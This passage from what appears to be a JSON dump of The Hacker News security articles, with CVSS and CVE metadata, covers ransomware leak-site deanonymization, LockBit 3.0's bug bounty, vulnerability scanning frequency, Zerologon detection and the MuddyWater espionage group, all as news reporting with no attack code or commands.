Ransomware Sites on Dark Web](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiKBfxqmczj3qrieqIFbqxh8pEIBTtSz9_BdFyfDEKmGEjCUPpH7QhuZsHt6jxBWgKWU2wcnFlthPIVmExegrtxg0bzvUln74smXx6Krggvf6_bQ9tr_o1NRTxCcjmsINrMdRyZpvXHdS8zZSeFCw8zi_qx2puc2SGz4zIL9dtTRKkdNSYZMGX3KE3p/s728-e1000/keys.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiKBfxqmczj3qrieqIFbqxh8pEIBTtSz9_BdFyfDEKmGEjCUPpH7QhuZsHt6jxBWgKWU2wcnFlthPIVmExegrtxg0bzvUln74smXx6Krggvf6_bQ9tr_o1NRTxCcjmsINrMdRyZpvXHdS8zZSeFCw8zi_qx2puc2SGz4zIL9dtTRKkdNSYZMGX3KE3p/s728-e100/keys.jpg>)\n\nFurther analysis of the successful root user logins showed that they originated from two IP addresses 5.230.29[.]12 and 176.119.0[.]195, the former of which belongs to GHOSTnet GmbH, a hosting provider that offers Virtual Private Server (VPS) services.\n\n\"176.119.0[.]195 however belongs to AS58271 which is listed under the name Tyatkova Oksana Valerievna,\" Eubanks noted. \"It's possible the operator forgot to use the German-based VPS for obfuscation and logged into a session with this web server directly from their true location at 176.119.0[.]195.\"\n\n### LockBit adds a bug bounty program to its revamped RaaS operation\n\nThe development comes as the operators of the emerging [Black Basta](<https://thehackernews.com/2022/06/cybersecurity-experts-warn-of-emerging.html>) ransomware [expanded](<https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html>) their attack arsenal by using QakBot for initial access and lateral movement, and taking advantage of the PrintNightmare vulnerability ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>)) to conduct privileged file operations.\n\nWhat's more, the LockBit ransomware gang last week [announced](<https://twitter.com/vxunderground/status/1541156954214727685>) the release of LockBit 3.0 with the message \"Make Ransomware Great Again!,\" in addition to launching their own Bug Bounty program, offering rewards ranging between $1,000 and $1 million for identifying security flaws and \"brilliant ideas\" to improve its software.\n\n[![bug bounty program](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwyY9trUR2Z6AyEmJ7Zm0vLXiYawK0UpJysKcAGEK4eyTyY-cibr3Vgf7ATbqzCSSUqeTQTR_TQkAtJ5XPpqiw8JZnWQg1KTo0ktefqdmaqc8XFgVp27DzMej76ut1FMMJ8h0r2U-UR72FNxbM4_q9ph1cAzMroG_05T9as1lDjAVK34y53Er0koFQ/s728-e1000/bug.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwyY9trUR2Z6AyEmJ7Zm0vLXiYawK0UpJysKcAGEK4eyTyY-cibr3Vgf7ATbqzCSSUqeTQTR_TQkAtJ5XPpqiw8JZnWQg1KTo0ktefqdmaqc8XFgVp27DzMej76ut1FMMJ8h0r2U-UR72FNxbM4_q9ph1cAzMroG_05T9as1lDjAVK34y53Er0koFQ/s728-e100/bug.jpg>)\n\n\"The release of LockBit 3.0 with the introduction of a bug bounty program is a formal invitation to cybercriminals to help assist the group in its quest to remain at the top,\" Satnam Narang, senior staff research engineer at Tenable, said in a statement shared with The Hacker News.\n\n\"A key focus of the bug bounty program are defensive measures: Preventing security researchers and law enforcement from finding bugs in its leak sites or ransomware, identifying ways that members including the affiliate program boss could be doxed, as well as finding bugs within the messaging software used by the group for internal communications and the Tor network itself.\"\n\n\"The threat of being doxed or identified signals that law enforcement efforts are clearly a great concern for groups like LockBit. Finally, the group is planning to offer Zcash as a payment option, which is significant, as Zcash is harder to trace than Bitcoin, making it harder for researchers to keep tabs on the group's activity.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T07:06:00", "type": "thn", "title": "Researchers Share Techniques to Uncover Anonymized Ransomware Sites on Dark Web", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-07-06T06:06:49", "id": "THN:849B821D3503018DA38FAFFBC34DAEBB", "href": "https://thehackernews.com/2022/07/researchers-share-techniques-to-uncover.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T12:37:17", "description": "[![](https://thehackernews.com/images/-vruoSSS5wk0/Ya4AYUe14nI/AAAAAAAABbU/FtvPpcz7lV4dikARV6H4Gx_WTBY835n-ACNcBGAsYHQ/s0/Vulnerability-Scanner.jpg)](<https://thehackernews.com/images/-vruoSSS5wk0/Ya4AYUe14nI/AAAAAAAABbU/FtvPpcz7lV4dikARV6H4Gx_WTBY835n-ACNcBGAsYHQ/s0/Vulnerability-Scanner.jpg>)\n\nSo you've decided to set up a vulnerability scanning programme, great. That's one of the best ways to avoid data breaches. How often you should run your scans, though, isn't such a simple question. The answers aren't the same for every type of organization or every type of system you're scanning.\n\nThis guide will help you understand the questions you should be asking and help you come up with the answers that are right for you.\n\n## How often should vulnerability scans be run\n\nA lot of the advice below depends on what exactly you're scanning. If you're not sure about that yet - check out this comprehensive [vulnerability scanning guide](<https://www.intruder.io/guides/the-ultimate-guide-to-vulnerability-scanning?utm_campaign=The%20Hacker%20News&utm_source=thehackernews>).\n\nOnce you've decided which systems should be in scope, and what type of scanner you need, you're ready to start scanning. So how often should you ideally be running vulnerability scans?\n\nHere are five strategies to consider, and we'll discuss in which scenarios they work best:\n\n * Change-based\n * Hygiene-based\n * Compliance-based\n * Resource-based\n * Emerging threat-based\n\n#### Change-based\n\nFast-moving tech companies often deploy code or infrastructure changes multiple times a day, while other organizations can have a relatively static setup, and may not be making regular changes to any of their systems. \n\nThe complexity of technology we use means that each change can bring with it a catastrophic configuration mistake, or the accidental introduction of a component with known vulnerabilities. For this reason, running a vulnerability scan after even minor changes are applied to your systems is a sensible approach.\n\nBecause it's based on changes, this approach is most suited for rapidly changing assets, like web applications, or cloud infrastructure like AWS, Azure and GCP, where new assets can be deployed and destroyed on a minute-by-minute basis. It's also particularly worth doing in cases where these systems are exposed to the public internet.\n\nFor this reason, many companies choose to integrate testing tools into their deployment pipelines automatically via an API with their chosen scanning tool.\n\nIt's also worth considering how complex the change you're making is.\n\nWhile automated tools are great for regular testing, the bigger or more dramatic the change you're making, the more you may want to consider getting a penetration test to double-check no issues have been introduced.\n\nGood examples of this might be making big structural changes to the architecture of web applications, any sweeping authentication or authorization changes, or large new features introducing lots of complexity. On the infrastructure side the equivalent might be a big migration to the cloud, or moving from one cloud provider to another.\n\n#### Hygiene-based\n\nEven if you don't make regular changes to your systems, there is still an incredibly important reason to scan your systems on a regular basis, and one that is often overlooked by organizations new to vulnerability scanning.\n\nSecurity researchers regularly find new vulnerabilities in the software of all kinds and public exploit code which makes exploiting them a breeze can be publicly disclosed at any time. This is what has been the cause of some of the most impactful hacks in recent history, from the Equifax breach to the Wannacry ransomware, both were caused by new flaws being uncovered in common software, and criminals rapidly weaponizing exploits to their own ends.\n\nNo software is exempt from this rule of thumb. Whether it's your web server, operating systems, a particular development framework you use, your remote-working VPN, or firewall. The end result is that even if you had a scan yesterday that said you were secure, that's not necessarily going to be true tomorrow.\n\n_New vulnerabilities are discovered every day, so even if no changes are deployed to your systems, they could become vulnerable overnight._\n\nDoes that mean that you should simply be running vulnerability scans non-stop though? Not necessarily, as that could generate problems from excess traffic, or mask any problems occurring.\n\nFor a yardstick, the notorious WannaCry cyber-attack shows us that timelines in such situations are tight, and organizations that don't react in reasonable time to both discover and remediate their security issues put themselves at risk. Microsoft released a patch for [the vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>) WannaCry used to spread just 59 days before the attacks took place. What's more, attackers were able to produce an exploit and start compromising machines only 28 days after a public exploit was leaked.\n\nLooking at the timelines in this case alone, it's clear that by not running vulnerability scans and fixing issues within a 30-60 day window is taking a big risk, and don't forget that even after you've discovered the issue, it may take some time to fix.\n\nOur recommendation for good cyber hygiene for most businesses, is to use a vulnerability scanner on your external facing infrastructure on at least a monthly basis, to allow you to keep one step ahead of these nasty surprises. For organizations with a heightened sensitivity to cyber security, weekly or even daily scans may make more sense. Similarly, internal infrastructure scans once a month helps maintain good cyber hygiene.\n\nFor web applications, scanning their framework and infrastructure components on a regular basis makes equal sense, but if you're looking for mistakes in your own code with authenticated scans, a change-based approach makes much more sense.\n\n#### Compliance-based\n\nIf you're running vulnerability scans for compliance reasons, then specific regulations often explicitly state how often vulnerability scans should be performed. For instance, PCI DSS requires that quarterly external scans are performed on the systems in its scope.\n\nHowever, you should think carefully about your scanning strategy, as regulatory rules are meant as a one-size-fits-all guideline that may not be appropriate for your business.\n\nSimply comparing this 90-day regulation with the timelines seen in the WannaCry example above shows us that such guidelines don't always cut the mustard. If you actually want to stay secure rather than simply ticking a box, often it makes sense to go above and beyond these regulations, in the ways described above.\n\n#### Resource-based\n\nVulnerability scanners can produce a vast amount of information, and reveal a lot of flaws, some of which will be bigger risks than others. When considering the amount of information that needs processing, and the amount of work that needs to take place to rectify these flaws, it can be tempting to think it only makes sense to scan as often as you can deal with all the output, like once a quarter.\n\nWhile that would be a nice way to do things, unfortunately, new vulnerabilities are being discovered on a much more regular basis than that, so rather than limiting your scans to how often you can deal with the output, it is much more sensible to seek out a scanner that generates less noise in the first place, and helps you focus on the most important issues first; and gives you guidance about on what kind of timescales the others should be addressed.\n\n[Intruder](<https://www.intruder.io?utm_campaign=The%20Hacker%20News&utm_source=thehackernews>) is one example of such a scanner. It was designed to automatically prioritize issues that have a real impact on your security, filtering out informational noise from your scan findings. Intruder's scan results are tailored for the internet-facing systems, meaning it can help you to monitor and reduce the attack surface.\n\n[![Finding vulnerabilities](https://thehackernews.com/images/--xl_nLbT7Q8/Ya3-SGKfWaI/AAAAAAAABbE/JPmJhwd-s2krfBUTQ9XhHs9w7DMlm5HBwCNcBGAsYHQ/s728-e1000/image-12.jpg)](<https://thehackernews.com/images/--xl_nLbT7Q8/Ya3-SGKfWaI/AAAAAAAABbE/JPmJhwd-s2krfBUTQ9XhHs9w7DMlm5HBwCNcBGAsYHQ/s0/image-12.jpg>) \n--- \nA screenshot of Intruder's Issues page that helps technical teams quickly see what requires their immediate attention. \n \nIt's also the case that, as humans, we start to ignore things if they become too noisy. Alert-fatigue is a genuine concern in cyber security, so you should make sure you're working with a tool that's not spamming you with information 24/7, as this may make you stop paying attention, and more likely to miss the important issues when they happen. Make sure to factor this in when choosing a scanner, as it's a common mistake to think that the one that gives you the most output is the best!\n\n#### Emerging-threat based\n\nSo now that you've decided on what schedule to run your scans, it's worth considering what happens in the gaps when you're not running scans.\n\nFor example, say you decide that a monthly scan makes sense for you to pick up on any changes you make on a semi-regular basis. That's great, but as the timelines for the Equifax breach shows, you might have a problem even in such a short space as 30 days, if a vulnerability is discovered the day after your last scan. Combining our thoughts around alert-fatigue above though, just scheduling a daily scan may not be the best way to avoid this.\n\nTo tackle this problem, some vulnerability scanners provide ways to cover these gaps - some do it by storing the information retrieved on the last scan, and alerting you if that information is relevant to any new vulnerabilities as they are released.\n\nIn the case of Intruder, which also offers a similar concept, called \"Emerging Threat Scans,\" their software proactively scans customers each time a new vulnerability emerges. This allows to ensure all the information is up to date, and no false alerts are raised based on old information.\n\n[![Finding vulnerabilities](https://thehackernews.com/images/-we8OSXaK5Z0/Ya3-SFFEIHI/AAAAAAAABbI/BFWtJhwhKAsbw_fiLkW-4_3EYMGNA317ACNcBGAsYHQ/s728-e1000/image-11.jpg)](<https://thehackernews.com/images/-we8OSXaK5Z0/Ya3-SFFEIHI/AAAAAAAABbI/BFWtJhwhKAsbw_fiLkW-4_3EYMGNA317ACNcBGAsYHQ/s0/image-11.jpg>) \n--- \nAs soon as new vulnerabilities are discovered, Intruder proactively scans your systems and automatically alerts you. \n \n#### To sum up\n\nAs with many things in the realm of cyber security, there is no size-fits-all approach to figuring out your ideal scanning frequency. Depending on the type of assets that you're guarding or a particular industry that you're operating in, the answer will be different. We hope this article has helped you make an informed decision about the right frequency of vulnerability scanning for your own organization. \n\n## The Intruder vulnerability assessment platform\n\nIntruder is a fully automated vulnerability assessment tool designed to check your infrastructure for upwards of 10,000 known weaknesses. It's designed to save you time by proactively running security scans, monitoring network changes, synchronizing cloud systems, and more. Intruder generates a report outlining the issues and offering actionable remediation advice \u2013 so you can find and fix your vulnerabilities before hackers reach them.\n\n[Intruder offers a 30-day free trial](<https://www.intruder.io/?utm_campaign=The%20Hacker%20News&utm_source=thehackernews>) of their vulnerability assessment platform. Visit their website today to take it for a spin!\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-12-06T12:22:00", "type": "thn", "title": "Vulnerability Scanning Frequency Best Practices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144"], "modified": "2021-12-06T12:22:29", "id": "THN:816878AF6F6091DFFD5EDD6489062840", "href": "https://thehackernews.com/2021/12/vulnerability-scanning-frequency-best.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:07", "description": "[![zerologon-hacking](https://thehackernews.com/images/-N0xbcq-gxX8/X2uOzdrqNPI/AAAAAAAAA0Q/VtK0ivICfDwyIva4z0EZIsiVjIzSFGUjwCLcBGAsYHQ/s728-e1000/zerologon-hacking.jpg)](<https://thehackernews.com/images/-N0xbcq-gxX8/X2uOzdrqNPI/AAAAAAAAA0Q/VtK0ivICfDwyIva4z0EZIsiVjIzSFGUjwCLcBGAsYHQ/s728/zerologon-hacking.jpg>)\n\n \nIf you're administrating Windows Server, make sure it's up to date with all recent patches issued by Microsoft, especially the one that fixes a recently patched critical vulnerability that could allow unauthenticated attackers to compromise the domain controller.\n\nDubbed 'Zerologon' (CVE-2020-1472) and discovered by Tom Tervoort of [Secura](<https://www.secura.com/blog/zero-logon>), the privilege escalation vulnerability exists due to the insecure usage of AES-CFB8 encryption for Netlogon sessions, allowing remote attackers to establish a connection to the targeted domain controller over Netlogon Remote Protocol (MS-NRPC).\n\n\"The attack utilizes flaws in an authentication protocol that validates the authenticity and identity of a domain-joined computer to the Domain Controller. Due to the incorrect use of an AES mode of operation, it is possible to spoof the identity of any computer account (including that of the DC itself) and set an empty password for that account in the domain,\" researchers at [cybersecurity firm Cynet](<https://www.cynet.com/zerologon>) explain in a blog post.\n\nThough the vulnerability, with a CVSS score of 10.0, was first disclosed to the public when [Microsoft released a patch](<https://thehackernews.com/2020/08/microsoft-software-patches.html>) for it in August, it became a matter of sudden concern after researchers published technical details and proof-of-concept of the flaw last week.\n\nAlong with [Indian](<https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES02&VLCODE=CIAD-2020-0063>) and [Australian](<https://www.cyber.gov.au/acsc/view-all-content/alerts/netlogon-elevation-privilege-vulnerability-cve-2020-1472>) Government agencies, the United States Cybersecurity and Infrastructure Security Agency (CISA) also issued an [emergency directive](<https://cyber.dhs.gov/ed/20-04/>) instructing federal agencies to patch Zerologon flaws on Windows Servers immediately.\n\n\"By sending a number of Netlogon messages in which various fields are filled with zeroes, an unauthenticated attacker could change the computer password of the domain controller that is stored in the AD. This can then be used to obtain domain admin credentials and then restore the original DC password,\" the advisories say.\n\nAccording to Secura, the said flaw can be exploited in the following sequence:\n\n * Spoofing the client credential\n * Disabling RPC Signing and Sealing\n * Spoofing a call\n * Changing Computer's AD Password\n * Changing Domain Admin Password\n\n\"CISA has determined that this vulnerability poses an unacceptable risk to the Federal Civilian Executive Branch and requires an immediate and emergency action.\"\n\n\"If affected domain controllers cannot be updated, ensure they are removed from the network,\" CISA advised.\n\nMoreover, Samba\u2014an implementation of SMB networking protocol for Linux systems\u2014versions 4.7 and below are also vulnerable to the Zerologon flaw. Now, a patch update for this software has also been issued.\n\nBesides explaining the root cause of the issue, Cynet also released details for some critical artifacts that can be used to detect active exploitation of the vulnerability, including a specific memory pattern in lsass.exe memory and an abnormal spike in traffic between lsass.exe.\n\n[![windows server](https://thehackernews.com/images/-YdHbLGBiv_g/X2uI6ukEXFI/AAAAAAAAA0E/7psHpWRafPs7SEs6Jypd0ns2PuAWNrFzwCLcBGAsYHQ/s728-e1000/windows-server.gif)](<https://thehackernews.com/images/-YdHbLGBiv_g/X2uI6ukEXFI/AAAAAAAAA0E/7psHpWRafPs7SEs6Jypd0ns2PuAWNrFzwCLcBGAsYHQ/s0/windows-server.gif>)\n\n\"The most documented artifact is Windows Event ID 4742 'A computer account was changed', often combined with Windows Event ID 4672 'Special privileges assigned to new logon'.\"\n\nTo let Windows Server users quickly detect related attacks, experts also released the YARA rule that can detect attacks that occurred prior to its deployment, whereas for realtime monitoring is a simple tool is also [available for download](<https://go.cynet.com/hubfs/Cynet-Zerologon-Detector.zip>).\n\nHowever, to completely patch the issue, users still recommend installing the latest software update from Microsoft as soon as possible.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-23T18:08:00", "type": "thn", "title": "Detecting and Preventing Critical ZeroLogon Windows Server Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-23T18:09:58", "id": "THN:F4928090525451C50A1B016ED3B0650F", "href": "https://thehackernews.com/2020/09/detecting-and-preventing-critical.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:07", "description": "[![cybersecurity webinar](https://thehackernews.com/images/-OmeZzerf_N4/X3NtaoiyhdI/AAAAAAAAAi8/u8cq1mrPXdgdsFqdMJ1DsNqrUiSeIC0bQCLcBGAsYHQ/s728-e1000/webinar.jpg)](<https://thehackernews.com/images/-OmeZzerf_N4/X3NtaoiyhdI/AAAAAAAAAi8/u8cq1mrPXdgdsFqdMJ1DsNqrUiSeIC0bQCLcBGAsYHQ/s728/webinar.jpg>)\n\n \nI am sure that many of you have by now heard of a recently disclosed critical Windows server vulnerability\u2014called [Zerologon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>)\u2014that could let hackers completely take over enterprise networks.\n\nFor those unaware, in brief, all supported versions of the Windows Server operating systems are vulnerable to a critical privilege escalation bug that resides in the [Netlogon Remote Control](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f>) Protocol for Domain Controllers.\n\nIn other words, the underlying vulnerability ([CVE-2020-1472](<https://www.secura.com/pathtoimg.php?id=2055>)) could be exploited by an attacker to compromise Active Directory services, and eventually, the Windows domain without requiring any authentication.\n\nWhat's worse is that a proof-of-concept exploit for this flaw was released to the public last week, and immediately after, attackers started exploiting the weakness against unpatched systems in the wild.\n\n[![zerologon](https://thehackernews.com/images/-LlDoRgABjaM/X3NtIHP8GkI/AAAAAAAAAi0/5IgY1LPymBsVm0FHNJsBkmUWqgqC1c-UACLcBGAsYHQ/s728-e1000/zerologon.jpg)](<https://thehackernews.com/images/-LlDoRgABjaM/X3NtIHP8GkI/AAAAAAAAAi0/5IgY1LPymBsVm0FHNJsBkmUWqgqC1c-UACLcBGAsYHQ/s0/zerologon.jpg>)\n\nAs described in our [coverage](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>) based on a technical analysis published by Cynet security researchers, the underlying issue is Microsoft's implementation of AES-CFB8, where it failed to use unique, random salts for these Netlogon messages.\n\nThe attacker needs to send a specially crafted string of zeros in Netlogon messages to change the domain controller's password stored in the Active Directory.\n\nFor THN readers willing to learn more about this threat in detail, including technical information, mitigations, and detection techniques, they should join a live webinar ([register here](<https://go.cynet.com/webinar-zerologon/?utm_source=thn>)) with Aviad Hasnis, CTO at Cynet.\n\nThe free cybersecurity educational webinar is scheduled for September 30th at 5:00 PM GMT, and also aims to discuss exploits deployed in the wild to take advantage of this vulnerability.\n\nBesides this, the Cynet team has also released a free detection tool that alerts you to any Zerologon exploitation in your environment.\n\n[Register for the live webinar here](<https://go.cynet.com/webinar-zerologon/?utm_source=thn>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-29T17:26:00", "type": "thn", "title": "LIVE Webinar on Zerologon Vulnerability: Technical Analysis and Detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-29T17:26:49", "id": "THN:F53D18B9EB0F8CD70C9289288AC9E2E1", "href": "https://thehackernews.com/2020/09/zerologon-cybersecurity.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:43", "description": "[![US Cyber Command](https://thehackernews.com/new-images/img/a/AVvXsEiVFy-c1DNicC29AR3JBTrZ5vLEcY8DjJCDttbLNNeDlQZYaSjqUwPLUJ-s1PB7sY5MtBXBQIE3kr_q_JtCC1MWrPLvh1bj_s3_LKlvzXxATEAyDwPx4nE9sOS_sXNUdyfPzB4JC4ChR3tNCPMdi7u2Kzs4yfrnB7Uh3cBZP29GPNeHzdCf28ylkvRK=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEiVFy-c1DNicC29AR3JBTrZ5vLEcY8DjJCDttbLNNeDlQZYaSjqUwPLUJ-s1PB7sY5MtBXBQIE3kr_q_JtCC1MWrPLvh1bj_s3_LKlvzXxATEAyDwPx4nE9sOS_sXNUdyfPzB4JC4ChR3tNCPMdi7u2Kzs4yfrnB7Uh3cBZP29GPNeHzdCf28ylkvRK>)\n\nThe U.S. Cyber Command (USCYBERCOM) on Wednesday officially confirmed MuddyWater's ties to the Iranian intelligence apparatus, while simultaneously detailing the various tools and tactics adopted by the espionage actor to burrow into victim networks.\n\n\"MuddyWater has been seen using a variety of techniques to maintain access to victim networks,\" USCYBERCOM's Cyber National Mission Force (CNMF) [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/12/cnmf-identifies-and-discloses-malware-used-iranian-apt-muddywater>) in a statement. \"These include side-loading [DLLs](<https://en.wikipedia.org/wiki/Dynamic-link_library>) in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.\"\n\nThe agency characterized the hacking efforts as a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS), corroborating earlier reports about the nation-state actor's provenance.\n\nAlso tracked under the monikers Static Kitten, Seedworm, Mercury and TEMP.Zagros, [MuddyWater](<https://malpedia.caad.fkie.fraunhofer.de/actor/muddywater>) is known for its [attacks](<https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/>) primarily directed against a wide gamut of entities in governments, academia, cryptocurrency, telecommunications, and oil sectors in the Middle East. The group is believed to have been [active](<https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/>) at least [since 2017](<https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/>).\n\nRecent intrusions mounted by the adversary have involved exploiting the ZeroLogon (CVE-2020-1472) vulnerability as well as leveraging remote desktop management tools such as [ScreenConnect](<https://thehackernews.com/2021/02/iranian-hackers-utilize-screenconnect.html>) and [Remote Utilities](<https://thehackernews.com/2021/03/iranian-hackers-using-remote-utilities.html>) to deploy custom backdoors that could enable the attackers to gain unauthorized access to sensitive data.\n\nLast month, Symantec's Threat Hunter Team [publicized findings](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east>) about a new wave of hacking activities unleashed by the Muddywater group against a string of telecom operators and IT companies throughout the Middle East and Asia during the previous six months using a blend of legitimate tools, publicly available malware, and living-off-the-land ([LotL](<https://encyclopedia.kaspersky.com/glossary/lotl-living-off-the-land/>)) methods.\n\nAlso incorporated into its toolset is a backdoor named Mori and a piece of malware called PowGoop, a DLL loader designed to decrypt and run a PowerShell-based script that establishes network communications with a remote server.\n\nMalware samples attributed to the advanced persistent threat (APT) have been made available on the VirusTotal malware aggregation repository, which can be accessed [here](<https://www.virustotal.com/gui/user/CYBERCOM_Malware_Alert>).\n\n\"Analysis of MuddyWater activity suggests the group continues to evolve and adapt their techniques,\" SentinelOne researcher Amitai Ben Shushan Ehrlich [said](<https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/>). \"While still relying on publicly available offensive security tools, the group has been refining its custom toolset and utilizing new techniques to avoid detection.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T07:47:00", "type": "thn", "title": "US Cyber Command Links 'MuddyWater' Hacking Group to Iranian Intelligence", 